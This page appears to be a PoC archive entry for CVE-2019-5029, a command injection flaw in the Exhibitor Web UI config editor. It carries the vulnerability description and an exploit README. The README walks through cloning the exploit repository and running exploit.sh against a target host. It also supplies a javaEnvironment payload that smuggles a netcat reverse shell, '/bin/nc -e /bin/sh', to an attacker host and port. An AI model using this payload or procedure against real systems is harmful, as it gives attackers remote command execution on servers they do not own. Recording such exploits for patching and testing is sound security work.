Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-5029 PoC — Exhibitor 操作系统命令注入漏洞

Source
Associated Vulnerability
Title:Exhibitor 操作系统命令注入漏洞 (CVE-2019-5029)
Description:An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.
Description
Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029
Readme
# Exhibitor-RCE
Exhibitor Web Ui 1.7.1 RCE, CVE-2019-5029

## Step 1:

$ git clone https://github.com/thehunt1s0n/Exihibitor-RCE/

## Step 2:

$ cd Exihibitor-RCE/

## Step 3 (optional):

You might need to edit json data payload in the script. To do that simply capture the request using burpsuite when comiting the changes in the config tab of exihibitor and copy pasting into the curl command in the script.

<div style="text-align:center;">
  <img src="https://raw.githubusercontent.com/thehunt1s0n/Exihibitor-RCE/main/media/burpsuite_capture.png" alt="gif 1" width="500"/>
</div>

Make sure to change the javaEnvironment with the following:

"javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)"


## Step 4:

./exploit.sh <host> <port> <attacker_host> <attacker_port>

Example:

$ ./exploit.sh 192.168.197.98 8080 192.168.45.187 8080

![gif](https://raw.githubusercontent.com/thehunt1s0n/Exihibitor-RCE/main/media/Exihibitor_capture.gif)
File Snapshot

[4.0K] /data/pocs/c2a43d99eb3ef31848cad19aba41a5c216b60efe ├── [2.4K] exploit.sh ├── [4.0K] media │   ├── [ 83K] burpsuite_capture.png │   └── [654K] Exihibitor_capture.gif └── [ 967] README.md 1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →